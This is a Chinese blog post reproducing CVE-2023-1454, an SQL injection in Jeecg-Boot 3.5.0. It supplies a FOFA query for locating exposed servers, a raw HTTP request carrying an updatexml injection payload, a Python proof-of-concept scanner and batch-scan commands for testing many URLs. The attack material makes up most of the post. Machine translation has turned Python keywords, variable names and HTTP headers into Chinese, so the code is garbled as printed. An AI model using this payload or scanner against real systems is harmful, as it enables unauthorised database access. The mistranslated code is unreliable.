【漏洞复现】Jeecg(漏洞复现与漏洞攻击一样吗)

【漏洞复现】Jeecg一、Jeecg-Boot 简介 JeecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vu

一、Jeecg-Boot 简介

JeecgBoot是一个基于BPM的低代码平台。前后端分离架构支持SpringBoot 2.x、SpringCloud、Ant DesignVue、Mybatis-plus、Shiro、JWT和微服务。强大的代码生成器,一键生成前后端代码,实现低代码开发。 JeecgBoot引领了一种新的低代码开发模式OnlineCoding代码生成器手册MERGE,可以帮助Java项目解决70%的重复性任务,让开发更加专注于业务。这使您能够快速提高效率并节省研发成本,同时又不失灵活性。一套低代码功能:在线表单、在线报表、在线图表、表单设计、流程设计、报表设计、大屏设计等。

二、漏洞描述

jeecg-boot 3.5.0版本存在SQL注入漏洞。该漏洞是由jmreport/qurestSql文件中的安全问题引起的,导致通过参数apiSelectId进行SQL注入。

CVE-2023-1454

CNNVD-202303-1399

三、影响版本

jeecg-boot 版本3.5.0

四、fofa查询语句

body=”jeecg-boot”

五、漏洞复现

漏洞包

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1

User-Agent: Mozilla/4.0(兼容性;MSIE 8.0;Windows NT 6.1)

Accept-Encoding: gzip、deflate

接受: */*

关闭连接:

主机: 127.0.0.1

内容类型: 应用程序/json

内容长度: 126

{\’apiSelectId\’:\’1316997232402231298\’,\’id\’:\’1\’ 或\’%1%\’ 类似(updatexml(0x3a,concat(1,(select database()))),1)) 或\’%%\’ 类似\’ \’}

数据库名称发布成功

六、POCEXP

如果url.endswith(\’/\’):

路径=\’jeecg-boot/jmreport/qurestSql\’

: 其他

路径=\’/jeecg-boot/jmreport/qurestSql\’

第:章不是url.startswith(\’http://\’)也不是url.startswith(\’https://\’)

网址=\’http://\’+网址

编码文本=URL + 路径

标题={

\’用户代理\’: \’Mozilla/4.0(兼容性;MSIE 8.0;Windows NT 6.1)\’,

\’接受编码\’: \’gzip、deflate\’,

\’接受\’: \’*/*\’,

\’连接\’: \’关闭\’,

\’内容类型\’: \’应用程序/json\’

}

有效负载={

\’apiSelectId\’: \’1316997232402231298\’,

\’id\’: \’1\’ 或\’%1%\’ 类似(updatexml(0x3a,concat(1,(select database()))),1)) 或\’%%\’ \’\’

}

# 将负载转换为JSON

json_payload=json.dumps(有效负载)

尝试:

req=request.post(encodetext, data=json_payload, headers=headers, timeout=5, proxies=self.proxies)

res=请求文本

对于req.status_code==200 和res: 的“XPATH”

self.append_to_output(f\'[+] {url} Jeecg-Boot 前端SQL 注入漏洞(CVE-2023-1454) 存在!\’, \’red\’)

#self.append_to_output(res, \’黄色\’)

使用open(\’output.txt\’, \’a\’) 作为file:

file.write(f\'[+] {url} Jeecg-Boot 前端SQL 注入漏洞(CVE-2023-1454) 存在!\’ + \’\\n\’)

文件.write(res + \’\\n\’)

: 其他

self.append_to_output(f\'[-] {url} 不存在Jeecg-Boot 前端SQL 注入漏洞(CVE-2023-1454)\’, \’green\’)

不包括超时:

self.append_to_output(f\'[!] 请求超时并跳过URL: {url}\’, \’yellow\’)

除了e:

七、批量扫描

python3 CVE-2023-1454-scan.py -u http://127.0.0.1:1111 单个URL 测试

python3 CVE-2023-1454-scan.py -f url.txt 批量检测

扫描完成后,将在当前目录中生成包含漏洞URL 的vuln.txt。

https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln

#【漏洞复现】以上Jeecg相关内容摘自网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92598.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月27日 下午5:36
下一篇 2024年6月27日 下午5:36

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注